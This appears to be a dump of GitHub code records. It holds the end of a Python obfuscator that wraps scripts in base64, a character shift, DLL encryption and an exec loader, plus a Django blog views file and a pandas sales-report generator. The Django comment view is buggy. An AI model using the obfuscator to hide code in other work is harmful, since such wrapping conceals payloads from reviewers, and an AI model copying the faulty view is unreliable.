3\n\ndef xor(string2encrypt):\n finalstring = \"\"\n string2encrypt = binascii.hexlify(bytes(string2encrypt,\"utf-8\"))\n for c in string2encrypt.decode():\n e = ord(c)\n f = e + 10\n finalstring += chr(f)\n return finalstring\n\ndef unxor(string2encrypt):\n finalstring = \"\"\n for c in string2encrypt:\n e = ord(c)\n f = e - 10\n finalstring += chr(f)\n finalstring = finalstring.replace(\"\\x00\",\"\")\n finalstring = bytes.fromhex(finalstring)\n return finalstring.decode()\n\ndef returnCipher(code):\n if sys.platform == \"win32\":\n #if the windows architecture is 32 bits\n if ctypes.sizeof(ctypes.c_voidp)==4:\n mydll=ctypes.CDLL(os.getcwd()+\"\\\\_protector32.dll\")\n #if the windows architecture is 64 bits\n elif ctypes.sizeof(ctypes.c_voidp)==8:\n mydll=ctypes.CDLL(os.getcwd()+\"\\\\_protector.dll\")\n mydll.Xoring.restype = c_wchar_p\n result = mydll.Xoring(code,\"4JT6Qc493H8Zkth6F6Wzyx123456\") #4JT6Qc493H8Zkth6F6Wzyx123456 la mat ma trong protector.dll\n return result\n\ndef StringEncrypt(string):\n if sys.platform == \"win32\":\n if ctypes.sizeof(ctypes.c_voidp)==4:\n mydll=ctypes.CDLL(os.getcwd()+\"\\\\_protector32.dll\")\n elif ctypes.sizeof(ctypes.c_voidp)==8:\n mydll=ctypes.CDLL(os.getcwd()+\"\\\\_protector.dll\")\n #set the return type to wchar*\n mydll.StringEncrypt.restype = c_wchar_p\n #get the encrypted result\n result = mydll.StringEncrypt(string)\n return result\n\n\ndef obfuscation():\n #obfu variable\n xorencode = \"def EEE3E3E3E3(O0O0O0):\\n Z2ZZZZ2Z2 = ''\\n for A1A1A1A1 in O0O0O0:\\n POPOPOP = ord(A1A1A1A1)\\n O0O0O0O0 = POPOPOP - 10\\n Z2ZZZZ2Z2 += chr(O0O0O0O0)\\n Z2ZZZZ2Z2 = Z2ZZZZ2Z2\\n return binascii.unhexlify(bytes(Z2ZZZZ2Z2,'utf-8')).decode()\\n\"\n #string encryption\n file2obfu = input(\"Input your file to obfuscate: \")\n toobfu = \"\"\n filetoobfu = open(file2obfu,\"r\",encoding=\"utf-8\",errors=\"ignore\")\n for line in filetoobfu:\n toobfu += line\n filetoobfu.close()\n\n #create Protect folder\n os.system(\"mkdir Protected\")\n filename = file2obfu\n filetoobfu_create = open(\"Protected\\\\\"+os.path.basename(filename),\"w\").close()\n filename_len = len(os.path.basename(filename))\n path = os.path.abspath(filename[0:-filename_len])\n path = path+\"\\\\\"\n\n os.system(\"mkdir Protected\\\\Protector\")\n os.system(\"copy _protector.dll Protected\\\\Protector\")\n os.system(\"copy _protector32.dll Protected\\\\Protector\")\n\n #create protector.py\n protector = open(\"Protected\\\\Protector\\\\protector.py\",\"w\") # convert \"a\" mode to \"w\" mode\n protector.write(\"from ctypes import *\\nimport sys,ctypes\\nif sys.platform == 'win32':\\n if ctypes.sizeof(ctypes.c_voidp)==4:\\n mydll=ctypes.CDLL('FunnyProtector\\\\\\_protector32.dll')\\n elif ctypes.sizeof(ctypes.c_voidp)==8:\\n mydll=ctypes.CDLL('FunnyProtector\\\\\\_protector.dll')\\ndef returnCipher(code,file):\\n mydll.unXoring.restype = c_wchar_p\\n result = mydll.unXoring(code,file)\\n return result\")\n protector.close()\n\n #starting obfuscation\n filetoobfu = open(\"Protected\\\\\"+os.path.basename(filename),\"a\")\n #base64 the realcode with junk\n obfuscate = base64.b64encode(bytes(toobfu,\"utf-8\"))\n #xor the base64 encoded code\n xored_obfuscate = xor(obfuscate.decode())\n final_obfu = returnCipher(\"import base64,binascii\\r\\n\"+\n xorencode+\n \"\\r\\nexec(base64.b64decode(EEE3E3E3E3('\"+xored_obfuscate+\"')))\")\n\n filetoobfu.write(\"from Protector import protector\\nexec(protector.returnCipher('\"+final_obfu+\"',__file__))\")\n filetoobfu.close()\n\ndef main():\n os.system(\"cls\")\n obfuscation()\n\nif __name__ == \"__main__\":\n main()\n" } ]
2
saintexupery/djangopractice04
https://github.com/saintexupery/djangopractice04
e8bbdea495ff595fd1c71d8c16ee05486580ddb8
4015cf11542f9976414cdfd9fb24b611eb770fc3
3fb23acaa4299fcdf014230b3d3ce7f47959779d
refs/heads/master
2016-06-09T05:38:00.037297
2016-05-10T18:07:59
2016-05-10T18:07:59
58,475,962
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5883561372756958, "alphanum_fraction": 0.5904109477996826, "avg_line_length": 27.096153259277344, "blob_id": "d1f8faee923fc02bb35b82b6211371bb1b20089b", "content_id": "97d38e90ce2945986219e0503e185a1e4b34b889", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1498, "license_type": "no_license", "max_line_length": 73, "num_lines": 52, "path": "/blog/views.py", "repo_name": "saintexupery/djangopractice04", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom .models import Post\nfrom blog.forms import CommentForm\n\ndef post_list(request):\n post_list = Post.objects.all()\n return render(request, 'blog/post_list.html', {\n 'post_list' : post_list,\n })\n\ndef post_detail(request, pk):\n post = Post.objects.get(pk=pk)\n return render(request, 'blog/post_detail.html', {\n 'post' : post,\n })\n\n''' 이 부분 어디가 잘못되었는지 찾지를 못하겠다...\ndef comment_new(request, post_pk):\n if request.method == 'POST':\n form = CommentForm(request.POST, request.FILES)\n if form.is_vaild():\n comment = fomr.save(commit=False)\n comment.post = Post.objects.get(pk=post_pk)\n comment.save()\n return redirect('blog:post_detail', post_pk)\n else:\n form = CommentForm()\n\n return render(request, 'blog/comment_form.html', { 'form' : form,\n })\n'''\n\ndef comment_new(request, post_pk):\n# form = CommentForm()\n try:\n post = Post.objects.get(pk=post_pk)\n except Post.DoesNotExist:\n raise Http404\n\n if request.method == 'POST':\n form = CommentForm(request.POST, request.FILES)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.save\n return redirect(post)\n else:\n form = CommentForm()\n\n return render(request, 'blog/comment_form.html', {\n 'form': form\n })" } ]
1
kennedybacelar/test_environment_company
https://github.com/kennedybacelar/test_environment_company
fc406979885287ec1add06de94ec6b1396d40fa4
2b580aa552ab307564cd720b0f0b296f04712f22
5ce710adcb3fecf74a3e5824a1a88424d1261534
refs/heads/master
2022-11-20T20:20:14.912741
2020-07-07T16:25:38
2020-07-07T16:25:38
280,008,160
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6683411598205566, "alphanum_fraction": 0.6709246039390564, "avg_line_length": 44.41981887817383, "blob_id": "5b9571b350c1e67afb2df12f7335e34e929ef0da", "content_id": "7e6ce0e3db8568e11c647c2566f994b62c48e5d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34841, "license_type": "no_license", "max_line_length": 210, "num_lines": 767, "path": "/Entrepidus_generator.py", "repo_name": "kennedybacelar/test_environment_company", "src_encoding": "UTF-8", "text": "import pandas as pd\npd.options.mode.chained_assignment = None\nimport numpy as np\nimport sys\nfrom datetime import datetime, date\nsys.path.insert(1, 'Ent_generator')\nimport logger\nimport os\nimport warnings\n\nwarnings.simplefilter(action='ignore', category=pd.errors.PerformanceWarning)\n\ndef getting_user_input():\n\n STR_indicator = False\n\n root_path = input('Please inform root path: \\n')\n root_path = root_path.replace('\\\\', '/')\n\n country = input('Please inform the country of the distrbutor: \\n')\n country = country.lower()\n\n STR_country_list = ['paraguay', 'uruguay']\n\n if (country in STR_country_list):\n STR_indicator = True\n\n return [root_path, country, STR_indicator]\n\ndef getting_system_paths(root_path, country, STR_indicator):\n\n sales_file_path = str(root_path) + '/sales.txt'\n\n catalogs_root_path = '../../../Catalogs/Traditional_STR/'\n product_by_distributor_file_name = 'pebac_ref_prod.xlsx'\n\n if STR_indicator:\n product_by_distributor_file_name = 'str_ref_prod.xlsx'\n\n pebac_master_data_product_file_path = catalogs_root_path + 'Product_catalog/' + product_by_distributor_file_name\n product_master_path = catalogs_root_path + 'Product_catalog/product_master.xlsx'\n customer_catalog_file_path = catalogs_root_path + 'Customer_catalog/' + country + '_customer_catalog.xlsx'\n dist_names_file_path = catalogs_root_path + 'dist_names.xlsx'\n\n entrepidus_stock_directory_path = '/'.join(root_path.split('/')[:-1])\n entrepidus_stock_file_path = entrepidus_stock_directory_path + '/Entrepidus_STOCK.csv'\n\n system_paths = [sales_file_path, pebac_master_data_product_file_path, \n product_master_path, customer_catalog_file_path, dist_names_file_path, root_path, entrepidus_stock_file_path]\n\n return system_paths\n\ndef loading_dataframes(system_paths):\n\n sales_file_path = system_paths[0]\n pebac_master_data_product_file_path = system_paths[1]\n product_master_path = system_paths[2]\n customer_catalog_file_path = system_paths[3]\n dist_names_file_path = system_paths[4]\n\n df_sales_columns = ['Country', 'Diageo Customer ID', 'Diageo Customer Name', \n 'Invoice number', 'Type of Invoice',\t'Invoice Date', 'Store code', 'Product Code', \n 'Quantity', 'Unit of measure', 'Total Amount WITHOUT TAX', 'Total Amount WITH TAX', \n 'Currency Code', 'Sales Representative Code']\n\n #Loading Data Frame of Sales File\n try:\n df_sales = pd.read_csv(sales_file_path, index_col=False, names=df_sales_columns,sep=';', low_memory=False,\n dtype={ 'Quantity':str, 'Store code':str, 'Product Code':str, 'Invoice Date':str,\n 'Total Amount WITH TAX':str, 'Total Amount WITHOUT TAX':str }, header=0).fillna('')\n except:\n logger.logger.error('Not possible opening the file{}'.format(sales_file_path))\n print('Not possible opening the file - {}'.format(sales_file_path))\n sys.exit()\n\n #Loading Data Frame of (De->Para) / Product Customer -> Diageo SKU\n try:\n df_pebac_product_reference = pd.read_excel(pebac_master_data_product_file_path, converters = { 'Dist_Code': str, 'Product_store_id': str} ).fillna('')\n df_pebac_product_reference.set_index(['Dist_Code', 'Product_store_id'], inplace=True) \n except:\n logger.logger.info('Not possible opening the file / setting index{}'.format(pebac_master_data_product_file_path))\n print('Not possible opening the file - {}'.format(pebac_master_data_product_file_path))\n sys.exit()\n\n #Loading Data Frame of Product Master Data\n try:\n df_product_master = pd.read_excel(product_master_path, dtype={ 'Material': str }).fillna('') \n except:\n logger.logger.info('Not possible opening the file / setting index{}'.format(product_master_path))\n print('Not possible opening the file - {}'.format(product_master_path))\n sys.exit()\n\n #Loading Data Frame of Customer Catalog Per Country\n try:\n df_customer_catalog = pd.read_excel(customer_catalog_file_path, converters={ 'Distributor_id':str, 'Store_id':str } ).fillna('') \n except:\n logger.logger.info('Not possible opening the file / setting index{}'.format(customer_catalog_file_path))\n print('Not possible opening the file - {}'.format(customer_catalog_file_path))\n sys.exit()\n \n #Loading Data Frame of Distributors correct name and country\n try:\n df_dist_names = pd.read_excel(dist_names_file_path, dtype=str ).fillna('')\n except:\n print('Not possible opening file - {}'.format(dist_names_file_path))\n logger.logger.error('Not possible opening file - {}'.format(dist_names_file_path))\n sys.exit()\n\n\n #Dropping unecessary columns of Dataframes to keep processing light\n try:\n df_sales.drop(columns=['Type of Invoice', 'Sales Representative Code'], inplace=True)\n except:\n logger.logger.info('Not possible dropping Columns of file - {}'.format(sales_file_path))\n\n #Dropping unecessary columns of Product_master field\n try:\n df_product_master.drop(columns=['PRDHA L7 Packaging', 'Packaging', 'PRDHA L6 Volume',\n 'Subbrand', 'PRDHA L4 Brand Variant', 'PRDHA L3 Brand', 'PRDHA L2 Group',\n 'Group', 'PRDHA L1 Main Group', 'EU Size', 'Case Size'], inplace=True)\n except:\n logger.logger.info('Not possible dropping Columns of file - {}'.format(product_master_path))\n\n return [df_sales, df_pebac_product_reference, df_product_master, df_customer_catalog, df_dist_names]\n\n\ndef sanitizing_sales_file(df_sales):\n \n #Removing negative sign from the end of the values (Some samples were found)\n values_that_end_with_negative_sign_quantity = (df_sales['Quantity'].str[-1] == '-')\n df_sales.loc[values_that_end_with_negative_sign_quantity, 'Quantity'] = '-' + df_sales.loc[values_that_end_with_negative_sign_quantity, 'Quantity'].str[:-1]\n \n values_that_end_with_negative_sign_total_with_tax = (df_sales['Total Amount WITH TAX'].str[-1] == '-')\n df_sales.loc[values_that_end_with_negative_sign_total_with_tax, 'Total Amount WITH TAX'] = '-' + df_sales.loc[values_that_end_with_negative_sign_total_with_tax, 'Total Amount WITH TAX'].str[:-1]\n \n values_that_end_with_negative_sign_total_without_tax = (df_sales['Total Amount WITHOUT TAX'].str[-1] == '-')\n df_sales.loc[values_that_end_with_negative_sign_total_without_tax, 'Total Amount WITHOUT TAX'] = '-' + df_sales.loc[values_that_end_with_negative_sign_total_without_tax, 'Total Amount WITHOUT TAX'].str[:-1]\n \n #Turning it numeric below quantities\n df_sales['Quantity'] = pd.to_numeric(df_sales['Quantity']).fillna(0)\n df_sales['Total Amount WITH TAX'] = pd.to_numeric(df_sales['Total Amount WITH TAX']).fillna(0)\n df_sales['Total Amount WITHOUT TAX'] = pd.to_numeric(df_sales['Total Amount WITHOUT TAX']).fillna(0)\n \n #Removing spaces and leading zeros from below columns\n df_sales['Product Code'] = df_sales['Product Code'].str.lstrip('0')\n df_sales['Store code'] = df_sales['Store code'].str.lstrip('0')\n df_sales['Store code'] = df_sales['Store code'].str.strip()\n\n #Cutting characters after the 12th position from Store Code column\n df_sales['Store code'] = df_sales['Store code'].str[:12]\n\n return df_sales\n\ndef sanitizing_df_pebac_product_reference(df_pebac_product_reference):\n\n df_pebac_product_reference.columns = [column.encode('mbcs').decode('mbcs', 'ignore') for column in df_pebac_product_reference.columns]\n df_pebac_product_reference['Scale'] = pd.to_numeric(df_pebac_product_reference['Scale']).fillna(1)\n\n return df_pebac_product_reference\n\ndef declaring_entrepidus_df():\n\n entrepidus_columns = ['Date', 'Store Number', 'Store Name', 'Chain', 'Supervisor', 'Region',\n 'Commune', 'Merchandiser', 'Chain SKU Code', 'Diageo SKU Code',\t'Desc Producto & Cód.',\n 'Category', 'Sub Category', 'Brand', 'Brand Variant', 'Unit Size', 'Unit Sold', \n 'Sales Value wotax', 'Sales Value wtax', 'Currency Code', 'Distributor', 'Country', \n 'Inventory Unit', 'Diageo_dist_auxiliar_column']\n\n try:\n try:\n df_entrepidus = pd.DataFrame(columns=entrepidus_columns).fillna('')\n except IOError as err:\n logger.logger.info('{}'.format(err))\n sys.exit(err)\n except:\n logger.logger.info('Not possible creating DataFrame df_entrepidus')\n sys.exit('Not possible creating DataFrame df_entrepidus')\n \n return df_entrepidus\n\ndef setting_df_entrepidus_and_sales(df_entrepidus, df_sales):\n\n try:\n df_entrepidus['Country'] = df_sales['Country']\n df_entrepidus['Sales Value wotax'] = df_sales['Total Amount WITHOUT TAX']\n df_entrepidus['Sales Value wtax'] = df_sales['Total Amount WITH TAX']\n df_entrepidus['Currency Code'] = df_sales['Currency Code']\n df_entrepidus['Store Number'] = df_sales['Store code']\n df_entrepidus['Date'] = df_sales['Invoice Date']\n df_entrepidus['Chain SKU Code'] = df_sales['Product Code']\n df_entrepidus['Distributor'] = df_sales['Diageo Customer Name']\n df_entrepidus['Unit Sold'] = df_sales['Quantity']\n df_entrepidus['Inventory Unit'] = 0\n\n #Auxiliar Columns - Won't be written into the excel file\n df_entrepidus['Diageo_dist_auxiliar_column'] = df_sales['Diageo Customer ID']\n df_entrepidus['Aux_unit_of_measure'] = df_sales['Unit of measure']\n\n #Changing to String below Columns\n df_entrepidus['Diageo_dist_auxiliar_column'] = df_entrepidus['Diageo_dist_auxiliar_column'].astype(str).fillna('')\n df_sales['Product Code'] = df_sales['Product Code'].astype(str).fillna('')\n df_entrepidus['Store Number'] = df_entrepidus['Store Number'].astype(str).fillna('')\n #Changing to Numeric below Columns\n df_entrepidus['Unit Sold'] = pd.to_numeric(df_entrepidus['Unit Sold'])\n #Lowering entrepidus series\n df_entrepidus['Aux_unit_of_measure'] = df_entrepidus['Aux_unit_of_measure'].astype(str).fillna('').str.lower()\n except:\n logger.logger.error('Not possible setting_df_entrepidus / sales')\n sys.exit('Not possible setting_df_entrepidus')\n \n return [df_entrepidus, df_sales]\n\ndef assigning_dist_names_and_country_to_entrepidus(df_entrepidus, df_dist_names):\n\n list_of_distributors = df_entrepidus['Diageo_dist_auxiliar_column'].unique()\n df_entrepidus.set_index(['Diageo_dist_auxiliar_column'], inplace=True)\n df_entrepidus.index = df_entrepidus.index.map(str)\n\n df_dist_names.set_index(['Distributor_id'], inplace=True)\n df_dist_names.index = df_dist_names.index.map(str)\n df_dist_names = df_dist_names[~df_dist_names.index.duplicated(keep='first')]\n\n for single_distributor in list_of_distributors:\n single_distributor = str(single_distributor)\n\n try:\n distributor_correct_name = df_dist_names.loc[single_distributor, 'Distributor_name']\n distributor_correct_country = df_dist_names.loc[single_distributor, 'Distributor_country']\n except:\n print('Dist name columns Distributor_name or Distributor_country not found')\n logger.logger.error('Dist name columns Distributor_name or Distributor_country not found')\n\n try:\n df_entrepidus.loc[single_distributor, 'Distributor'] = distributor_correct_name\n except:\n print('Error- Distributor name in dist_names file: {}'.format(single_distributor))\n logger.logger.error('Not possible assigning distributor name from Dist_names_file - {}'.format(single_distributor))\n \n try:\n df_entrepidus.loc[single_distributor, 'Country'] = distributor_correct_country\n except:\n print('Not possible assigning distributor country from Dist_names_file - {}'.format(single_distributor))\n logger.logger.error('Not possible assigning distributor country from Dist_names_file - {}'.format(single_distributor))\n \n df_dist_names.reset_index(inplace=True) \n df_entrepidus.reset_index(inplace=True)\n return df_entrepidus\n\ndef searching_diageo_sku(df_sales, df_product_master, df_entrepidus):\n\n list_of_distributors = df_sales['Diageo Customer ID'].unique()\n \n df_sales = df_sales.set_index(['Diageo Customer ID'])\n df_sales.index = df_sales.index.map(str)\n\n df_entrepidus = df_entrepidus.set_index(['Diageo_dist_auxiliar_column', 'Chain SKU Code'])\n df_entrepidus.index = df_entrepidus.index.set_levels(df_entrepidus.index.levels[0].astype(str), level=0)\n df_entrepidus.index = df_entrepidus.index.set_levels(df_entrepidus.index.levels[1].astype(str), level=1)\n \n for single_distributor in list_of_distributors:\n single_distributor = str(single_distributor)\n products_list_by_distributor = df_sales.loc[single_distributor]['Product Code'].unique()\n\n for single_product_by_distributor in products_list_by_distributor:\n single_product_by_distributor = str(single_product_by_distributor)\n\n try:\n diageo_sku = df_product_master.loc[(single_distributor, single_product_by_distributor), 'Diageo_Sku'].values[0]\n df_entrepidus.loc[(single_distributor, single_product_by_distributor), 'Diageo SKU Code'] = diageo_sku\n except:\n df_entrepidus.loc[(single_distributor, single_product_by_distributor), 'Diageo SKU Code'] = '0000 - NOT FOUND'\n print('{} - New product found'.format(single_product_by_distributor))\n logger.logger.warning('{} - Product not found'.format(single_product_by_distributor))\n\n df_entrepidus.reset_index(inplace = True)\n df_product_master.reset_index(inplace=True)\n return df_entrepidus\n \n\n#Filling Entrepidus with the product details\ndef filling_product_details(df_entrepidus, df_product_master):\n\n df_product_master.set_index(['Material'], inplace=True)\n df_product_master.index = df_product_master.index.map(str) #Changing indexes into string\n df_product_master = df_product_master[~df_product_master.index.duplicated(keep='last')]\n\n list_of_diageo_sku_unique = df_entrepidus['Diageo SKU Code'].unique()\n\n df_entrepidus.set_index(['Diageo SKU Code'], inplace=True)\n df_entrepidus.index = df_entrepidus.index.map(str) #Changing indexes into string\n\n for specific_diageo_sku in list_of_diageo_sku_unique:\n specific_diageo_sku = str(specific_diageo_sku)\n try:\n df_entrepidus['Desc Producto & Cód.'].loc[specific_diageo_sku] = df_product_master['Description'].loc[specific_diageo_sku]\n df_entrepidus['Category'].loc[specific_diageo_sku] = df_product_master['Main Group'].loc[specific_diageo_sku]\n df_entrepidus['Sub Category'].loc[specific_diageo_sku] = df_product_master['Subcategory'].loc[specific_diageo_sku]\n df_entrepidus['Brand'].loc[specific_diageo_sku] = df_product_master['Brand'].loc[specific_diageo_sku]\n df_entrepidus['Brand Variant'].loc[specific_diageo_sku] = df_product_master['Brand Variant'].loc[specific_diageo_sku]\n df_entrepidus['Unit Size'].loc[specific_diageo_sku] = df_product_master['Unit Size'].loc[specific_diageo_sku]\n except:\n logger.logger.error('{} - Not possible filling this product details'.format(specific_diageo_sku))\n \n df_entrepidus.reset_index(inplace=True)\n return df_entrepidus\n\n\n#Filling Entrepidus with quantities (Unit sold - after multiplying for the product tx)\ndef calculating_quantity(df_entrepidus, df_pebac_product_reference):\n\n df_pebac_product_reference.set_index(['Dist_Code', 'Product_store_id'], inplace=True)\n #Changing the first level of a multindex to String\n df_pebac_product_reference.index = df_pebac_product_reference.index.set_levels(df_pebac_product_reference.index.levels[0].astype(str), level=0)\n df_pebac_product_reference.index = df_pebac_product_reference.index.set_levels(df_pebac_product_reference.index.levels[1].astype(str), level=1)\n\n list_of_distributors = df_entrepidus['Diageo_dist_auxiliar_column'].unique()\n\n for single_distributor in list_of_distributors:\n single_distributor = str(single_distributor)\n\n filt_single_distributor = (df_entrepidus['Diageo_dist_auxiliar_column'] == single_distributor)\n list_of_products_by_distributor = df_entrepidus.loc[filt_single_distributor, 'Chain SKU Code'].unique()\n\n df_entrepidus['Diageo_dist_auxiliar_column'] = df_entrepidus['Diageo_dist_auxiliar_column'].astype(str).fillna('')\n df_entrepidus['Chain SKU Code'] = df_entrepidus['Chain SKU Code'].astype(str).fillna('')\n\n for single_product in list_of_products_by_distributor:\n single_product = str(single_product)\n\n try:\n multiplicative_factor = df_pebac_product_reference.loc[( single_distributor , single_product ), 'Scale'].values\n multiplicative_factor = multiplicative_factor[0]\n except:\n logger.logger.info('multiplicative_factor not found in df_pebac_product_reference for Distributor - {} Product - {}'.format(single_distributor, single_product))\n multiplicative_factor = 1\n\n try:\n filt_key_dist_prod = (df_entrepidus['Diageo_dist_auxiliar_column'] == str(single_distributor) ) & (df_entrepidus['Chain SKU Code'] == str(single_product)) \n df_entrepidus.loc[filt_key_dist_prod, 'Unit Sold'] = df_entrepidus.loc[filt_key_dist_prod, 'Unit Sold'].multiply(multiplicative_factor)\n except:\n logger.logger.error(' Error multiplication - Bottles por Physical Case - dist/product {}/{}'.format(single_distributor, single_product))\n \n try:\n df_entrepidus['Unit Sold'] = df_entrepidus['Unit Sold'].round(0).astype(int)\n except:\n logger.logger.error('Not possible rounding df_entrepidus[Unit Sold]')\n\n df_pebac_product_reference.reset_index(inplace=True)\n df_entrepidus.reset_index(inplace=True)\n\n return df_entrepidus\n\n#Filling Entrepidus with the store names\ndef getting_store_name(df_entrepidus, df_customer_catalog):\n\n new_stores = list()\n\n df_customer_catalog.set_index([ 'Distributor_id', 'Store_id' ], inplace=True)\n #Changing the first level of a multindex to String\n df_customer_catalog.index = df_customer_catalog.index.set_levels(df_customer_catalog.index.levels[0].astype(str), level=0)\n df_customer_catalog.index = df_customer_catalog.index.set_levels(df_customer_catalog.index.levels[1].astype(str), level=1)\n \n list_of_distributors = df_entrepidus['Diageo_dist_auxiliar_column'].unique()\n\n df_entrepidus['Diageo_dist_auxiliar_column'] = df_entrepidus['Diageo_dist_auxiliar_column'].astype(str).fillna('')\n df_entrepidus['Store Number'] = df_entrepidus['Store Number'].astype(str).fillna('')\n\n for single_distributor in list_of_distributors:\n single_distributor = str(single_distributor)\n \n filt_single_distributor = (df_entrepidus['Diageo_dist_auxiliar_column'] == single_distributor)\n list_of_unique_stores_by_distributor = df_entrepidus.loc[(filt_single_distributor), 'Store Number'].unique()\n\n \n for unique_store in list_of_unique_stores_by_distributor:\n unique_store = str(unique_store)\n\n try:\n store_name = df_customer_catalog.loc[[(single_distributor, unique_store)], 'Store_name'].values\n store_name = store_name[0]\n except:\n new_unique_store = single_distributor + '|' + unique_store\n new_stores.append(new_unique_store)\n store_name = '0000 - NOT FOUND'\n\n try:\n filt_single_store_by_distributor = ((df_entrepidus['Diageo_dist_auxiliar_column'] == str(single_distributor)) & (df_entrepidus['Store Number'] == str(unique_store)))\n df_entrepidus.loc[(filt_single_store_by_distributor), 'Store Name'] = store_name\n except:\n pass\n\n df_customer_catalog.reset_index(inplace=True)\n\n return [df_entrepidus, new_stores]\n\n\n#Filtering Period - Unused yet\ndef filtering_period(df_entrepidus, previous_and_current_month_period):\n\n current_month = previous_and_current_month_period[0]\n previous_month = previous_and_current_month_period[1]\n\n entrepidus_filtered_period = ((df_entrepidus['Date'].str[:6] == current_month) | (df_entrepidus['Date'].str[:6] == previous_month))\n df_entrepidus = df_entrepidus.loc[entrepidus_filtered_period]\n\n return df_entrepidus\n\ndef creating_new_stores_dataframe():\n\n new_store_columns = ['Aux_column_dist_number', 'POS_ID', 'Store Nbr', 'Store Name', 'Chain', 'Commercial Group', 'Store/Business Type',\n 'Subchannel', 'Channel', 'Trade', 'Segment', 'Occasion', 'Occasion Segment', 'Mechandiser', 'Supervisor',\n 'Provice or Commune', 'City', 'State or Region', 'Country', 'COU']\n\n df_new_stores = pd.DataFrame(columns=new_store_columns).fillna('')\n \n return df_new_stores\n\n# Registering new stores\ndef registering_new_stores(new_stores, df_new_stores):\n\n unique_stores = list(set(new_stores)) #Getting new stores - Filtering and getting unique values\n\n for individual_store in unique_stores:\n\n distributor_and_store_split = individual_store.split('|')\n distributor_id = distributor_and_store_split[0]\n store_number = distributor_and_store_split[1]\n\n df_new_stores_lenght = len(df_new_stores)\n\n df_new_stores.loc[df_new_stores_lenght, 'Aux_column_dist_number'] = distributor_id\n df_new_stores.loc[df_new_stores_lenght, 'Store Nbr'] = store_number\n \n df_new_stores.fillna('', inplace=True)\n\n return df_new_stores\n\n\n# Getting current and previous month\ndef get_previous_and_current_month_period():\n \n today = date.today()\n month = today.month\n year = today.year\n\n if (month == 1):\n year_previous_month = year - 1\n previous_month = 12\n else:\n year_previous_month = year\n previous_month = month - 1\n \n current_month = str(year) + str(month).zfill(2)\n previous_month = str(year_previous_month) + str(previous_month).zfill(2)\n\n return [current_month, previous_month]\n\n#Final formatting entrepidus\ndef entrepidus_formatting(df_entrepidus):\n\n df_entrepidus.reset_index(inplace=True)\n try:\n df_entrepidus.drop(columns=['level_0', 'index'], inplace=True)\n except:\n logger.logger.warning('Not possible dropping columns to generate excel file')\n\n entrepidus_columns = ['Diageo_dist_auxiliar_column', 'Date', 'Store Number', 'Store Name', 'Chain', 'Supervisor', 'Region',\n 'Commune', 'Merchandiser', 'Chain SKU Code', 'Diageo SKU Code',\t'Desc Producto & Cód.',\n 'Category', 'Sub Category', 'Brand', 'Brand Variant', 'Unit Size', 'Unit Sold', \n 'Sales Value wotax', 'Sales Value wtax', 'Currency Code', 'Distributor', 'Country', \n 'Inventory Unit']\n\n df_entrepidus = df_entrepidus.reindex(columns=entrepidus_columns)\n #df_entrepidus = df_entrepidus.sort_values(by='Date', ascending=False)\n\n return df_entrepidus\n\ndef verifying_values_with_without_tax(df_entrepidus):\n\n df_entrepidus['Sales Value wtax'] = pd.to_numeric(df_entrepidus['Sales Value wtax'], errors='coerce').fillna(0)\n df_entrepidus['Sales Value wotax'] = pd.to_numeric(df_entrepidus['Sales Value wotax'], errors='coerce').fillna(0)\n\n sum_value_with_tax = df_entrepidus['Sales Value wtax'].sum()\n sum_value_without_tax = df_entrepidus['Sales Value wotax'].sum()\n\n if ( sum_value_without_tax > sum_value_with_tax ):\n\n df_entrepidus.rename(columns={ 'Sales Value wtax':'Sales Value wotax', 'Sales Value wotax':'Sales Value wtax' }, inplace=True)\n\n return df_entrepidus\n\ndef loading_stock_file(entrepidus_stock_file_path):\n\n found_entrepidus_stock = True\n\n try:\n df_entrepidus_stock = pd.read_csv( entrepidus_stock_file_path, encoding='mbcs', index_col=False, sep=';', low_memory=False,\n dtype=str ).fillna('')\n except:\n logger.logger.info('No stock file found on {}'.format(entrepidus_stock_file_path))\n print('Entrepidus_stock not found for this distributor!')\n found_entrepidus_stock = False\n\n if (found_entrepidus_stock == True):\n return [found_entrepidus_stock, df_entrepidus_stock]\n else:\n return [ found_entrepidus_stock ]\n\n\ndef formatting_stock_file(df_entrepidus_stock):\n\n df_entrepidus_stock = df_entrepidus_stock.assign(Diageo_dist_auxiliar_column = '-')\n\n df_entrepidus_stock.columns = [column.encode('mbcs').decode('mbcs', 'ignore') for column in df_entrepidus_stock.columns]\n \n try:\n df_entrepidus_stock['Inventory Unit'] = pd.to_numeric(df_entrepidus_stock['Inventory Unit']).fillna(0)\n except:\n print('Not possible changing to Numeric column Inventory Unit of df_entrepidus_stock')\n logger.logger.error('Not possible changing to Numeric column Inventory Unit of df_entrepidus_stock')\n\n entrepidus_stock_columns = ['Diageo_dist_auxiliar_column', 'Date', 'Store Number', 'Store Name', 'Chain', 'Supervisor', 'Region',\n 'Commune', 'Merchandiser', 'Chain SKU Code', 'Diageo SKU Code',\t'Desc Producto & Cód.',\n 'Category', 'Sub Category', 'Brand', 'Brand Variant', 'Unit Size', 'Unit Sold', \n 'Sales Value wotax', 'Sales Value wtax', 'Currency Code', 'Distributor', 'Country', \n 'Inventory Unit']\n\n df_entrepidus_stock = df_entrepidus_stock.reindex(columns=entrepidus_stock_columns)\n\n return df_entrepidus_stock\n\n\ndef appending_entrepidus_stock_to_entrepidus_sales(df_entrepidus_stock, df_entrepidus):\n\n try:\n df_entrepidus = df_entrepidus.append(df_entrepidus_stock, ignore_index=True)\n except:\n logger.logger.error('Not posible appending Stock to Entrepidus')\n \n return df_entrepidus\n\n# Creating Excel flie -------\ndef creating_csv_files(df_entrepidus, df_new_stores, root_path):\n\n today_date = datetime.today()\n today_date = today_date.strftime(\"%Y%m%d\") \n csv_entrepidus_file_path = root_path + '/EntrepidusDistributors_' + today_date + '_automated.csv'\n csv_customer_file_path = root_path + '/Customers Catalogue_automated.csv'\n\n try:\n df_entrepidus[df_entrepidus.columns].to_csv(csv_entrepidus_file_path, encoding='mbcs', sep=';',\n columns=df_entrepidus.columns, index=False)\n except:\n print('Not possible creating EntrepidusDistributors CSV File')\n logger.logger.error('Not possible creating EntrepidusDistributors CSV File')\n \n try:\n df_new_stores.to_csv(csv_customer_file_path, sep=';', encoding='mbcs', index=False)\n 